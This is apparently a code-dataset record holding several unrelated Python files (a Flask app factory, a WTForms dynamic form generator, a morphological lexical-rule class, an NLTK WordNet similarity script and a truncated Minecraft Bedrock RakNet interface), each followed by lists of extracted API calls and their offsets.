# 将configClass传入到logging.basicConfig(level=configClass),但是需要不同环境中设置好日志级别,来调用。
configClass = config_dict[config_name]
# 设置日志的记录等级
logging.basicConfig(level=configClass.LOG_LEVEL) # 调试debug级 调用不同环境中到日志等级
# 创建日志记录器,指明日志保存的路径、每个日志文件100兆、保存的日志文件个数上限10个
file_log_handler = RotatingFileHandler("logs/log", maxBytes=1024 * 1024 * 100, backupCount=10)
# 创建日志记录的格式 日志等级 输入日志信息的文件名 行数 日志信息
formatter = logging.Formatter('%(levelname)s %(filename)s:%(lineno)d %(message)s')
# 为刚创建的日志记录器设置日志记录格式
file_log_handler.setFormatter(formatter)
# 为全局的日志工具对象(flask app使用的)添加日志记录器
logging.getLogger().addHandler(file_log_handler)
"""
# ofo生产单车:原材料--->车间--->小黄
# 工厂方法:传入配置名称--->返回对应配置的app对象
# development: --> app开发模式的app对象
# production: --> app线上模式的app对象
"""
# todo 谁传给你参数
"""创建app create_app方法:工厂方法"""
def craete_app(config_name):
# 之所以在这里调用日志函数 是因为日志和运行环境有关系,要是运行环境日志就不用经常显示错误 增加服务器压力。开发环境就不一样
setup_log(config_name)
app = Flask(__name__)
configClass = config_dict[config_name]
app.config.from_object(configClass) # 添加配置类到app
"""
SQLALchemy 实际上是对数据库的抽象,让开发者不用直接和 SQL 语句打交道,而是通过 Python 对象来操作数据库,在舍弃一些性能开销的同时,换来的是开发效率的较大提升
SQLAlchemy是一个关系型数据库框架,它提供了高层的 ORM 和底层的原生数据库的操作。flask-sqlalchemy 是一个简化了 SQLAlchemy 操作的flask扩展。
文档地址:http://docs.jinkan.org/docs/flask-sqlalchemy
"""
# 创建数据库对象
db = SQLAlchemy(app)
# 创建redis数据库对象
global redis_store
redis_store = StrictRedis(host=configClass.REDIS_HOST, port=configClass.REDIS_PORT, db=configClass.REDIS_NUM)
# 4.开启csrf保护机制
"""
1.自动获取cookie中的csrf_token,
2.自动获取ajax请求头中的csrf_token
3.自己校验这两个值
"""
csrf = CSRFProtect(app)
# 创建Session对象,将Session的存储方法进行调整(flask后端内存调整到redis服务器)
Session(app)
# 注册首页蓝图对象
from info.moduls.index import index_bp
app.register_blueprint(index_bp)
# 注册(注册页面)蓝图对象
from info.moduls.passport import passport_bp
app.register_blueprint(passport_bp)
# 返回不同模式下的app对象 开发模式 生产模式
return app
| [
"logging.basicConfig",
"logging.getLogger",
"flask.Flask",
"logging.Formatter",
"flask_wtf.csrf.CSRFProtect",
"logging.handlers.RotatingFileHandler",
"flask_session.Session",
"redis.StrictRedis",
"flask_sqlalchemy.SQLAlchemy"
] | [((355, 367), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', ([], {}), '()\n', (365, 367), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((680, 728), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'configClass.LOG_LEVEL'}), '(level=configClass.LOG_LEVEL)\n', (699, 728), False, 'import logging\n'), ((827, 902), 'logging.handlers.RotatingFileHandler', 'RotatingFileHandler', (['"""logs/log"""'], {'maxBytes': '(1024 * 1024 * 100)', 'backupCount': '(10)'}), "('logs/log', maxBytes=1024 * 1024 * 100, backupCount=10)\n", (846, 902), False, 'from logging.handlers import RotatingFileHandler\n'), ((959, 1029), 'logging.Formatter', 'logging.Formatter', (['"""%(levelname)s %(filename)s:%(lineno)d %(message)s"""'], {}), "('%(levelname)s %(filename)s:%(lineno)d %(message)s')\n", (976, 1029), False, 'import logging\n'), ((1505, 1520), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (1510, 1520), False, 'from flask import Flask\n'), ((1903, 1918), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (1913, 1918), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((1979, 2079), 'redis.StrictRedis', 'StrictRedis', ([], {'host': 'configClass.REDIS_HOST', 'port': 'configClass.REDIS_PORT', 'db': 'configClass.REDIS_NUM'}), '(host=configClass.REDIS_HOST, port=configClass.REDIS_PORT, db=\n configClass.REDIS_NUM)\n', (1990, 2079), False, 'from redis import StrictRedis\n'), ((2196, 2212), 'flask_wtf.csrf.CSRFProtect', 'CSRFProtect', (['app'], {}), '(app)\n', (2207, 2212), False, 'from flask_wtf.csrf import CSRFProtect, generate_csrf\n'), ((2275, 2287), 'flask_session.Session', 'Session', (['app'], {}), '(app)\n', (2282, 2287), False, 'from flask_session import Session\n'), ((1142, 1161), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (1159, 1161), False, 'import logging\n')] |
"""Class to dynamically create the different forms in the config file
"""
import os
from wtforms import (
BooleanField, SelectField, StringField, FloatField, IntegerField,
FormField, TextAreaField, FieldList, DecimalField
)
from wtforms.validators import InputRequired, Optional, NumberRange, \
ValidationError, Length, UUID, URL, Email
from flask_wtf import FlaskForm as Form
from wtforms import Form as NoCsrfForm
from werkzeug.utils import secure_filename
import glob
import pandas as pd
from loris import config
from loris.app.forms import NONES
from loris.app.forms.formmixin import (
DynamicFileField, DictField, ListField,
JsonSerializableValidator, Extension, FormMixin
)
from loris.app.autoscripting.utils import (
json_reader, array_reader, recarray_reader,
frame_reader, series_reader, EnumReader, ListReader, TupleReader,
DictReader, DbReader
)
from loris.errors import LorisError
class AutoscriptedField:
def __init__(self, key, value, folderpath):
self.key = key
self.folderpath = folderpath
if isinstance(value, (str, list)):
self.value = value
self.description = None
self.default = None
self.required = True
self.iterate = None
self.loc = None
elif isinstance(value, dict):
truth = set(value) - {'type', 'comment', 'default', 'loc', 'iterate'}
if truth:
raise LorisError(
'Key in dynamic auto-generated form contains '
f'illegal keywords: {truth}.'
)
if 'type' not in value:
raise LorisError(
'Must provide type key for dynamic auto-generated form; '
f'only provided these keys for "{key}": {set(value)}.'
)
self.value = value.get('type')
self.description = value.get('comment', None)
self.default = value.get('default', None)
self.required = (
'default' not in value
or value.get('default', None) is not None)
self.loc = value.get('loc', None)
self.iterate = value.get('iterate', False)
else:
LorisError(f"value is wrong type {type(value)}")
self.get_field()
def get_field(self):
"""get initialized field
"""
self.field, self.post_process = self._get_field(
self.key, self.value, self.required, self.default,
self.description, self.iterate, self.loc, self.folderpath
)
@staticmethod
def file_processing(value):
if value == 'numpy.array':
post_process = array_reader
elif value == 'numpy.recarray':
post_process = recarray_reader
elif value == 'pandas.DataFrame':
post_process = frame_reader
elif value == 'pandas.Series':
post_process = series_reader
elif value == 'json':
post_process = json_reader
else:
return lambda x: x
return post_process
@classmethod
def _get_field(
cls, key, value, required, default, description,
iterate, loc, folderpath
):
"""get initialized field
"""
def post_process(x):
return x
if required:
kwargs = {
'validators': [InputRequired()],
'render_kw': {'nullable': False}
}
else:
kwargs = {
'validators': [Optional()],
'render_kw': {'nullable': True}
}
kwargs['default'] = default
kwargs['label'] = key.replace('_', ' ')
kwargs['description'] = (key if description is None else description)
if loc is None and not isinstance(value, dict):
if value == 'list':
kwargs['validators'].append(JsonSerializableValidator(list))
field = ListField(**kwargs)
elif value == 'dict':
kwargs['validators'].append(JsonSerializableValidator(dict))
field = DictField(**kwargs)
elif value == 'str':
field = StringField(**kwargs)
elif value == 'set':
kwargs['validators'].append(JsonSerializableValidator(list))
post_process = set
field = ListField(**kwargs)
elif value == 'tuple':
kwargs['validators'].append(JsonSerializableValidator(list))
post_process = tuple
field = ListField(**kwargs)
elif value == 'int':
field = IntegerField(**kwargs)
elif value == 'float':
field = FloatField(**kwargs)
elif value == 'bool':
kwargs['validators'] = [Optional()]
field = BooleanField(**kwargs)
elif value == 'numpy.array':
kwargs['validators'].append(Extension())
post_process = cls.file_processing(value)
field = DynamicFileField(**kwargs)
elif value == 'numpy.recarray':
kwargs['validators'].append(Extension())
post_process = cls.file_processing(value)
field = DynamicFileField(**kwargs)
elif value == 'pandas.DataFrame':
kwargs['validators'].append(Extension())
post_process = cls.file_processing(value)
field = DynamicFileField(**kwargs)
elif value == 'pandas.Series':
kwargs['validators'].append(Extension())
post_process = cls.file_processing(value)
field = DynamicFileField(**kwargs)
elif value == 'json':
kwargs['validators'].append(Extension(['json']))
post_process = cls.file_processing(value)
field = DynamicFileField(**kwargs)
elif value == 'file':
kwargs['validators'].append(
Extension(config['attach_extensions']))
field = DynamicFileField(**kwargs)
elif isinstance(value, list):
choices = [
str(ele).strip().strip('"').strip("'")
for ele in value
]
post_process = EnumReader(value, choices)
if default is None and not required:
choices = ['NULL'] + choices
kwargs['choices'] = [(ele, ele) for ele in choices]
field = SelectField(**kwargs)
else:
raise LorisError(
f"field value {value} not accepted for {key}."
)
elif loc is not None and value == 'database':
if not isinstance(loc, list) or not len(loc) == 2:
raise LorisError(
f"If type '{value}' then loc must be of type "
"list with exactly two elements: "
"1. the database table class. "
"2. the columns to fetch for selected entry (str or list)."
)
# get table from database table class name
table = config.get_table_from_classname(loc[0])
columns = loc[1]
# check columns
if isinstance(columns, str) and columns not in table.heading:
raise LorisError(
f"Column '{columns}' not in table "
f"{table.full_table_name}; cannot create field {key}."
)
elif (
not isinstance(columns, str)
and (set(columns) - set(table.heading))
):
raise LorisError(
f"Columns '{set(columns) - set(table.heading)}' not "
f"in table {table.full_table_name}; "
f"cannot create field {key}."
)
post_process = DbReader(table, columns)
# create choices
choices = table.proj().fetch()
choices = [
(str(ele), str(ele))
if len(ele) > 1
else (str(ele), str(ele[0]))
for ele in choices
]
choices = sorted(choices)
if default is None and not required:
choices = [('NULL', 'NULL')] + choices
kwargs['choices'] = choices
field = SelectField(**kwargs)
elif loc is not None and isinstance(value, str):
loc = secure_filename(loc)
locpath = os.path.join(folderpath, loc)
# try up to three base directories down
if not os.path.exists(locpath):
# try main autoscript folder
locpath = os.path.join(os.path.dirname(folderpath), loc)
if not os.path.exists(locpath):
locpath = os.path.join(
os.path.dirname(os.path.dirname(folderpath)), loc
)
if not os.path.exists(locpath):
raise LorisError(
f'Folder "{loc}" does not exist in '
f'autoscript folder '
f'"{os.path.basename(folderpath)}" '
f'and also not in the main autoscript folder.'
)
# get all files from folder
files = glob.glob(os.path.join(locpath, '*'))
# only match certain extensions
if (value == 'pandas.DataFrame') or (value == 'numpy.recarray'):
files = [
ifile for ifile in files
if (
ifile.endswith('.pkl')
or ifile.endswith('.npy')
or ifile.endswith('.csv')
or ifile.endswith('.json')
)
]
elif value == 'numpy.array':
files = [
ifile for ifile in files
if (
ifile.endswith('.pkl')
or ifile.endswith('.npy')
or ifile.endswith('.csv')
)
]
elif (value == 'json') or (value == 'pandas.Series'):
files = [ifile for ifile in files if ifile.endswith('.json')]
else:
# skip file that start with two underscores e.g. __init__.py
files = [
ifile
for ifile in files
if not os.path.basename(ifile).startswith('__')
]
# setup as choices
choices = [
(str(ele), os.path.split(ele)[-1])
for ele in files
]
# setup None choice
if default is None and not required:
choices = [('NULL', 'NULL')] + choices
kwargs['choices'] = choices
post_process = cls.file_processing(value)
field = SelectField(**kwargs)
elif isinstance(value, dict):
form, post_process = dynamic_autoscripted_form(
value, folderpath, NoCsrfForm
)
field = FormField(form)
# TODO set number of fieldlists (startswith numeric)
else:
raise LorisError(f"field value {value} not accepted for {key}.")
# make iterator (can add multiple values together)
if iterate:
field = FieldList(
field,
min_entries=int(required) + 1 # have one required field if so
)
post_process = ListReader(post_process)
return field, post_process
def dynamic_autoscripted_form(dictionary, folderpath, formclass=Form):
post_process_dict = {}
class DynamicForm(formclass, FormMixin):
pass
for key, value in dictionary.items():
# comments in the json or formatting guidelines start with _
if key.startswith('#'):
continue
if not key.isidentifier():
raise LorisError(
f"key {key} is not an identifier; i.e. alphanumeric "
"and underscore characters only. The key needs to be "
"an identifier if it is used as a keyword during function "
"calling."
)
auto_field = AutoscriptedField(
key, value, folderpath
)
post_process_dict[key] = auto_field.post_process
setattr(
DynamicForm,
key,
auto_field.field
)
return DynamicForm, DictReader(post_process_dict)
| [
"werkzeug.utils.secure_filename",
"wtforms.validators.Optional",
"wtforms.FormField",
"os.path.exists",
"loris.app.autoscripting.utils.DbReader",
"wtforms.StringField",
"os.path.split",
"loris.config.get_table_from_classname",
"loris.errors.LorisError",
"wtforms.FloatField",
"loris.app.forms.for... | [((12748, 12777), 'loris.app.autoscripting.utils.DictReader', 'DictReader', (['post_process_dict'], {}), '(post_process_dict)\n', (12758, 12777), False, 'from loris.app.autoscripting.utils import json_reader, array_reader, recarray_reader, frame_reader, series_reader, EnumReader, ListReader, TupleReader, DictReader, DbReader\n'), ((11772, 11796), 'loris.app.autoscripting.utils.ListReader', 'ListReader', (['post_process'], {}), '(post_process)\n', (11782, 11796), False, 'from loris.app.autoscripting.utils import json_reader, array_reader, recarray_reader, frame_reader, series_reader, EnumReader, ListReader, TupleReader, DictReader, DbReader\n'), ((12210, 12402), 'loris.errors.LorisError', 'LorisError', (['f"""key {key} is not an identifier; i.e. alphanumeric and underscore characters only. The key needs to be an identifier if it is used as a keyword during function calling."""'], {}), "(\n f'key {key} is not an identifier; i.e. alphanumeric and underscore characters only. The key needs to be an identifier if it is used as a keyword during function calling.'\n )\n", (12220, 12402), False, 'from loris.errors import LorisError\n'), ((4007, 4026), 'loris.app.forms.formmixin.ListField', 'ListField', ([], {}), '(**kwargs)\n', (4016, 4026), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((7267, 7306), 'loris.config.get_table_from_classname', 'config.get_table_from_classname', (['loc[0]'], {}), '(loc[0])\n', (7298, 7306), False, 'from loris import config\n'), ((8019, 8043), 'loris.app.autoscripting.utils.DbReader', 'DbReader', (['table', 'columns'], {}), '(table, columns)\n', (8027, 8043), False, 'from loris.app.autoscripting.utils import json_reader, array_reader, recarray_reader, frame_reader, series_reader, EnumReader, ListReader, TupleReader, DictReader, DbReader\n'), ((8507, 8528), 'wtforms.SelectField', 'SelectField', ([], {}), '(**kwargs)\n', (8518, 8528), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((1463, 1553), 'loris.errors.LorisError', 'LorisError', (['f"""Key in dynamic auto-generated form contains illegal keywords: {truth}."""'], {}), "(\n f'Key in dynamic auto-generated form contains illegal keywords: {truth}.')\n", (1473, 1553), False, 'from loris.errors import LorisError\n'), ((3430, 3445), 'wtforms.validators.InputRequired', 'InputRequired', ([], {}), '()\n', (3443, 3445), False, 'from wtforms.validators import InputRequired, Optional, NumberRange, ValidationError, Length, UUID, URL, Email\n'), ((3579, 3589), 'wtforms.validators.Optional', 'Optional', ([], {}), '()\n', (3587, 3589), False, 'from wtforms.validators import InputRequired, Optional, NumberRange, ValidationError, Length, UUID, URL, Email\n'), ((3950, 3981), 'loris.app.forms.formmixin.JsonSerializableValidator', 'JsonSerializableValidator', (['list'], {}), '(list)\n', (3975, 3981), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((4162, 4181), 'loris.app.forms.formmixin.DictField', 'DictField', ([], {}), '(**kwargs)\n', (4171, 4181), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((6908, 7094), 'loris.errors.LorisError', 'LorisError', (['f"""If type \'{value}\' then loc must be of type list with exactly two elements: 1. the database table class. 2. the columns to fetch for selected entry (str or list)."""'], {}), '(\n f"If type \'{value}\' then loc must be of type list with exactly two elements: 1. the database table class. 2. the columns to fetch for selected entry (str or list)."\n )\n', (6918, 7094), False, 'from loris.errors import LorisError\n'), ((7461, 7569), 'loris.errors.LorisError', 'LorisError', (['f"""Column \'{columns}\' not in table {table.full_table_name}; cannot create field {key}."""'], {}), '(\n f"Column \'{columns}\' not in table {table.full_table_name}; cannot create field {key}."\n )\n', (7471, 7569), False, 'from loris.errors import LorisError\n'), ((8604, 8624), 'werkzeug.utils.secure_filename', 'secure_filename', (['loc'], {}), '(loc)\n', (8619, 8624), False, 'from werkzeug.utils import secure_filename\n'), ((8647, 8676), 'os.path.join', 'os.path.join', (['folderpath', 'loc'], {}), '(folderpath, loc)\n', (8659, 8676), False, 'import os\n'), ((11150, 11171), 'wtforms.SelectField', 'SelectField', ([], {}), '(**kwargs)\n', (11161, 11171), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((4105, 4136), 'loris.app.forms.formmixin.JsonSerializableValidator', 'JsonSerializableValidator', (['dict'], {}), '(dict)\n', (4130, 4136), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((4239, 4260), 'wtforms.StringField', 'StringField', ([], {}), '(**kwargs)\n', (4250, 4260), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((8748, 8771), 'os.path.exists', 'os.path.exists', (['locpath'], {}), '(locpath)\n', (8762, 8771), False, 'import os\n'), ((9524, 9550), 'os.path.join', 'os.path.join', (['locpath', '"""*"""'], {}), "(locpath, '*')\n", (9536, 9550), False, 'import os\n'), ((11350, 11365), 'wtforms.FormField', 'FormField', (['form'], {}), '(form)\n', (11359, 11365), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((11459, 11517), 'loris.errors.LorisError', 'LorisError', (['f"""field value {value} not accepted for {key}."""'], {}), "(f'field value {value} not accepted for {key}.')\n", (11469, 11517), False, 'from loris.errors import LorisError\n'), ((4430, 4449), 'loris.app.forms.formmixin.ListField', 'ListField', ([], {}), '(**kwargs)\n', (4439, 4449), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((8857, 8884), 'os.path.dirname', 'os.path.dirname', (['folderpath'], {}), '(folderpath)\n', (8872, 8884), False, 'import os\n'), ((8914, 8937), 'os.path.exists', 'os.path.exists', (['locpath'], {}), '(locpath)\n', (8928, 8937), False, 'import os\n'), ((4338, 4369), 'loris.app.forms.formmixin.JsonSerializableValidator', 'JsonSerializableValidator', (['list'], {}), '(list)\n', (4363, 4369), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((4623, 4642), 'loris.app.forms.formmixin.ListField', 'ListField', ([], {}), '(**kwargs)\n', (4632, 4642), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((9106, 9129), 'os.path.exists', 'os.path.exists', (['locpath'], {}), '(locpath)\n', (9120, 9129), False, 'import os\n'), ((10829, 10847), 'os.path.split', 'os.path.split', (['ele'], {}), '(ele)\n', (10842, 10847), False, 'import os\n'), ((4529, 4560), 'loris.app.forms.formmixin.JsonSerializableValidator', 'JsonSerializableValidator', (['list'], {}), '(list)\n', (4554, 4560), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((4700, 4722), 'wtforms.IntegerField', 'IntegerField', ([], {}), '(**kwargs)\n', (4712, 4722), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((9023, 9050), 'os.path.dirname', 'os.path.dirname', (['folderpath'], {}), '(folderpath)\n', (9038, 9050), False, 'import os\n'), ((4782, 4802), 'wtforms.FloatField', 'FloatField', ([], {}), '(**kwargs)\n', (4792, 4802), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((4913, 4935), 'wtforms.BooleanField', 'BooleanField', ([], {}), '(**kwargs)\n', (4925, 4935), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((9320, 9348), 'os.path.basename', 'os.path.basename', (['folderpath'], {}), '(folderpath)\n', (9336, 9348), False, 'import os\n'), ((4877, 4887), 'wtforms.validators.Optional', 'Optional', ([], {}), '()\n', (4885, 4887), False, 'from wtforms.validators import InputRequired, Optional, NumberRange, ValidationError, Length, UUID, URL, Email\n'), ((5116, 5142), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (5132, 5142), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5021, 5032), 'loris.app.forms.formmixin.Extension', 'Extension', ([], {}), '()\n', (5030, 5032), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5326, 5352), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (5342, 5352), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((10688, 10711), 'os.path.basename', 'os.path.basename', (['ifile'], {}), '(ifile)\n', (10704, 10711), False, 'import os\n'), ((5231, 5242), 'loris.app.forms.formmixin.Extension', 'Extension', ([], {}), '()\n', (5240, 5242), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5538, 5564), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (5554, 5564), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5443, 5454), 'loris.app.forms.formmixin.Extension', 'Extension', ([], {}), '()\n', (5452, 5454), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5747, 5773), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (5763, 5773), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5652, 5663), 'loris.app.forms.formmixin.Extension', 'Extension', ([], {}), '()\n', (5661, 5663), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5955, 5981), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (5971, 5981), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((5852, 5871), 'loris.app.forms.formmixin.Extension', 'Extension', (["['json']"], {}), "(['json'])\n", (5861, 5871), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((6145, 6171), 'loris.app.forms.formmixin.DynamicFileField', 'DynamicFileField', ([], {}), '(**kwargs)\n', (6161, 6171), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((6081, 6119), 'loris.app.forms.formmixin.Extension', 'Extension', (["config['attach_extensions']"], {}), "(config['attach_extensions'])\n", (6090, 6119), False, 'from loris.app.forms.formmixin import DynamicFileField, DictField, ListField, JsonSerializableValidator, Extension, FormMixin\n'), ((6387, 6413), 'loris.app.autoscripting.utils.EnumReader', 'EnumReader', (['value', 'choices'], {}), '(value, choices)\n', (6397, 6413), False, 'from loris.app.autoscripting.utils import json_reader, array_reader, recarray_reader, frame_reader, series_reader, EnumReader, ListReader, TupleReader, DictReader, DbReader\n'), ((6610, 6631), 'wtforms.SelectField', 'SelectField', ([], {}), '(**kwargs)\n', (6621, 6631), False, 'from wtforms import BooleanField, SelectField, StringField, FloatField, IntegerField, FormField, TextAreaField, FieldList, DecimalField\n'), ((6672, 6730), 'loris.errors.LorisError', 'LorisError', (['f"""field value {value} not accepted for {key}."""'], {}), "(f'field value {value} not accepted for {key}.')\n", (6682, 6730), False, 'from loris.errors import LorisError\n')] |
import copy
from .reduplication import RegexTest
from .common_functions import check_for_regex
class LexRule:
"""
A class that represents a regex-based second order lexical
rule. Rules are applied after the primary morphological
analysis has been completed and are used to add fields
to the words which have certain combinations of features
in their morphological analyses.
Each rule must indicate either a lemma or a stem to which
it is applicable.
"""
def __init__(self, g, dictRule, errorHandler=None):
self.g = g
self.errorHandler = errorHandler
self.rxWhat = None
self.stem = None
self.lemma = None
self.searchFields = []
self.addFields = []
for obj in dictRule['content']:
if obj['name'] == 'search':
self.process_search(obj['content'])
elif obj['name'] == 'add':
self.process_add(obj['content'])
else:
self.raise_error('Unrecognized field in a lexical rule description: ',
obj)
def raise_error(self, message, data=None):
if self.errorHandler is not None:
self.errorHandler.RaiseError(message, data)
def apply(self, wf):
if wf.stem != self.stem and wf.lemma != self.lemma:
return None
for rxTest in self.searchFields:
if not check_for_regex(wf, rxTest, errorHandler=self.errorHandler,
checkWordform=True):
return None
wfNew = copy.deepcopy(wf)
wfNew.otherData += self.addFields
return wfNew
def process_search(self, dictRules):
for rule in dictRules:
field = rule['name']
value = rule['value']
if type(value) != str:
self.raise_error('Wrong field in a lexical rule.', value)
continue
if field == 'lex':
self.lemma = value
elif field == 'stem':
self.stem = value
else:
self.searchFields.append(RegexTest(field, value, errorHandler=self.errorHandler))
def process_add(self, dictRules):
for rule in dictRules:
field = rule['name']
value = rule['value']
self.addFields.append((field, value))
| [
"copy.deepcopy"
] | [((1584, 1601), 'copy.deepcopy', 'copy.deepcopy', (['wf'], {}), '(wf)\n', (1597, 1601), False, 'import copy\n')] |
import nltk
from nltk.corpus import wordnet
from nltk.corpus import wordnet as wn
from nltk.corpus import wordnet_ic
brown_ic = wordnet_ic.ic('ic-brown.dat')
semcor_ic = wordnet_ic.ic('ic-semcor.dat')
from nltk.corpus import genesis
genesis_ic = wn.ic(genesis, False, 0.0)
lion = wn.synset('lion.n.01')
cat = wn.synset('cat.n.01')
print(lion.res_similarity(cat, brown_ic))
print(lion.res_similarity(cat, genesis_ic))
print(lion.jcn_similarity(cat, brown_ic))
print(lion.jcn_similarity(cat, genesis_ic))
print(lion.lin_similarity(cat, semcor_ic))
| [
"nltk.corpus.wordnet_ic.ic",
"nltk.corpus.wordnet.synset",
"nltk.corpus.wordnet.ic"
] | [((128, 157), 'nltk.corpus.wordnet_ic.ic', 'wordnet_ic.ic', (['"""ic-brown.dat"""'], {}), "('ic-brown.dat')\n", (141, 157), False, 'from nltk.corpus import wordnet_ic\n'), ((170, 200), 'nltk.corpus.wordnet_ic.ic', 'wordnet_ic.ic', (['"""ic-semcor.dat"""'], {}), "('ic-semcor.dat')\n", (183, 200), False, 'from nltk.corpus import wordnet_ic\n'), ((246, 272), 'nltk.corpus.wordnet.ic', 'wn.ic', (['genesis', '(False)', '(0.0)'], {}), '(genesis, False, 0.0)\n', (251, 272), True, 'from nltk.corpus import wordnet as wn\n'), ((280, 302), 'nltk.corpus.wordnet.synset', 'wn.synset', (['"""lion.n.01"""'], {}), "('lion.n.01')\n", (289, 302), True, 'from nltk.corpus import wordnet as wn\n'), ((309, 330), 'nltk.corpus.wordnet.synset', 'wn.synset', (['"""cat.n.01"""'], {}), "('cat.n.01')\n", (318, 330), True, 'from nltk.corpus import wordnet as wn\n')] |
################################################################################
# #
# ____ _ #
# | _ \ ___ __| |_ __ _ _ _ __ ___ #
# | |_) / _ \ / _` | '__| | | | '_ ` _ \ #
# | __/ (_) | (_| | | | |_| | | | | | | #
# |_| \___/ \__,_|_| \__,_|_| |_| |_| #
# #
# Copyright 2021 <NAME> #
# #
# Permission is hereby granted, free of charge, to any person #
# obtaining a copy of this software and associated documentation #
# files (the "Software"), to deal in the Software without restriction, #
# including without limitation the rights to use, copy, modify, merge, #
# publish, distribute, sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is furnished to do so, #
# subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included #
# in all copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING #
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS #
# IN THE SOFTWARE. #
# #
################################################################################
from constant.version import version
from packet.mcbe.game_packet import game_packet
from player.bedrock_player import bedrock_player
from rak_net.server import server as rak_net_server
from threading import Thread
class rak_net_interface(Thread):
def __init__(self, server: object) -> None:
super().__init__()
self.server: object = server
self.rak_net_server: object = rak_net_server(server.config.data["ip_address"]["hostname"], server.config.data["ip_address"]["port"])
self.rak_net_server.interface: object = self
self.set_status(server.config.data["motd"], 0, server.config.data["max_players"])
def get_count(self) -> int:
name: str = self.rak_net_server.name.split(";")
return int(name[4])
def get_max_count(self) -> int:
name: str = self.rak_net_server.name.split(";")
return int(name[5])
def get_motd(self) -> str:
name: str = self.rak_net_server.name.split(";")
return name[1]
def set_status(self, motd: str, count: int, max_count: int) -> None:
self.rak_net_server.name: str = f"MCPE;{motd};{version.mcbe_protocol_version};{version.mcbe_version};{count};{max_count};0;"
def set_motd(self, motd: str) -> None:
self.set_status(motd, self.get_count(), self.get_max_count())
def set_count(self, count: int) -> None:
self.set_status(self.get_motd(), count, self.get_max_count())
def set_max_count(self, max_count: int) -> None:
self.set_status(self.get_motd(), self.get_count(), max_count)
def on_frame(self, packet: object, connection: object) -> None:
if connection.address.token in self.server.players:
if packet.body[0] == 0xfe:
new_packet: object = game_packet(packet.body)
new_packet.decode()
packets: list = new_packet.read_packets_data()
for batch in packets:
